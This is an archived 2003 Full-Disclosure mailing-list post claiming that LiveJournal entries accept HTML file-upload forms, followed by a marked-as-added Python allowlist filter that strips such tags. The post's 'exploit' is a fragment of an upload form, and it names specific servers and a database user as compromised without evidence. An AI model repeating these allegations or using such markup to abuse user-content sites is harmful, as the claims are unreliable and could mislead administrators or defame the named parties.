Synopsis: Livejournal.com and livejournal systems are vulnerable to remote file upload by anonymous users

Versions: all

Impact: Who cares ( maybe udp)

Description: LiveJournal.com is a free service that allows you to create and customize your very own "live journal" - a journal that you keep online!

Vulnerability: Live journal allows both anonymous and registered users to use "form enctype" and "post method" in their entries giving easy access to system compromise.

Exploit:

-----------partial( if you can't figure it out you are sad--------------
<head> meme-tronic</head>
<form enctype="multipart/form-data" method="post">
<TABLE WIDTH="100%">
<TR>
<TD ALIGN="RIGHT" VALIGN="TOP">Filename:</TD>
<TD ALIGN="LEFT"><INPUT TYPE="FILE" NAME="FILE1"> </TD>
</TR>
<TR>
<TD ALIGN="RIGHT"> </TD>
<TD ALIGN="LEFT"><INPUT TYPE="SUBMIT" NAME="SUB1" VALUE="Upload File"></TD></TR>
<TR>
--------------------------------------------------------------------------

Fix: I don't get paid to fix. I would suggest an rm on debian server as well as ns1.bradfitz.com and back up prior to 10/02 though

Sidenote: www.cccure.org - The CISSP and SSCP Open Study Guides Web site should also rm as MySql database user "cdupuis@localhost" was owned some time ago

Vendor Notification: None - This is full disclosure

Summer of the Sickness is drawing near.......

Copyright © 2003, Paper Street Soap Company, Inc.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
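
Added example (not part of the original post, and not LiveJournal's code): an allowlist filter for user-submitted entry HTML that drops form and input elements like those in the snippet above while keeping layout tags. The allowlist and the names EntryFilter, filter_entry and SAMPLE are assumptions made for illustration; SAMPLE is constructed from the markup quoted in the post.

```python
from html import escape
from html.parser import HTMLParser

# Assumed allowlist for entry markup: tag -> permitted attributes.
# Hypothetical policy for illustration, not any site's real one.
ALLOWED = {
    "b": set(), "i": set(), "p": set(), "br": set(),
    "table": {"width"}, "tr": set(), "td": {"align", "valign"},
}
VOID = {"br"}  # tags that take no closing tag


class EntryFilter(HTMLParser):
    """Re-emit only allowlisted tags and attributes; record dropped tags."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.dropped = [], []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        if tag not in ALLOWED:
            self.dropped.append(tag)  # form, input, script, ...
            return
        kept = "".join(
            f' {name}="{escape(value or "", quote=True)}"'
            for name, value in attrs if name in ALLOWED[tag]
        )
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text is always re-escaped so it can never turn back into markup.
        self.out.append(escape(data, quote=False))


def filter_entry(entry_html):
    """Return (filtered_html, dropped_tags) for one submitted entry."""
    f = EntryFilter()
    f.feed(entry_html)
    f.close()
    return "".join(f.out), f.dropped


# Constructed sample based on the form quoted in the post.
SAMPLE = ('<form enctype="multipart/form-data" method="post"><TABLE WIDTH="100%">'
          '<TR><TD ALIGN="RIGHT" VALIGN="TOP">Filename:</TD>'
          '<TD ALIGN="LEFT"><INPUT TYPE="FILE" NAME="FILE1"></TD></TR></TABLE></form>')
```

The dropped-tag list returned alongside the filtered HTML can be logged per entry to spot accounts that repeatedly submit form markup.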
This archive was generated by hypermail 2b30 : Fri Jun 06 2003 - 18:12:38 PDT